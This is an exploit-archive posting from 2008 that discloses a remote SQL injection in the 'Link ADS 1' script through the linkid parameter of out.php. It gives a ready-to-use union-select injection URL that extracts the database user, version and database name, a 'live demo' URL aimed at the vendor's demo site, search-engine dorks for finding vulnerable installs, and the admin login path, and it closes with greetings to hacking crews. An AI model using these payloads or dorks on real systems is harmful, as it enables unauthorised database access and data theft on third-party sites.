[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability
# Published : 2008-06-24
# Author : Hussin X
# Previous Title : E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability
# Next Title : TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit
#########################################################
#
# Link ADS 1 SQL Injection Vulnerability
#========================================================
#
# Author: Hussin X
#
# Home : www.tryag.cc/cc
#
# email: darkangel_g85[at]Yahoo[DoT]com
# hussin.x[at]hotmail[DoT]com
#
#========================================================
# HomE script : http://e-topbiz.com/
#
# Demo : http://e-topbiz.com/oprema/pages/linkads1.php
#
# DorK : out.php?linkid=1
# DorK : inurl:"out.php?linkid=1"
##########################################################
Exploit:
http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
L!VE DEMO:
http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
LogiN:
/admin/
################################################################################
####################################( Greetz )##################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #
# Silic0n / Rafi / FAHD / Iraqihack #
# #
#################################(and All IRAQIs)###############################
################################################################################
# www.Syue.com [2008-06-24]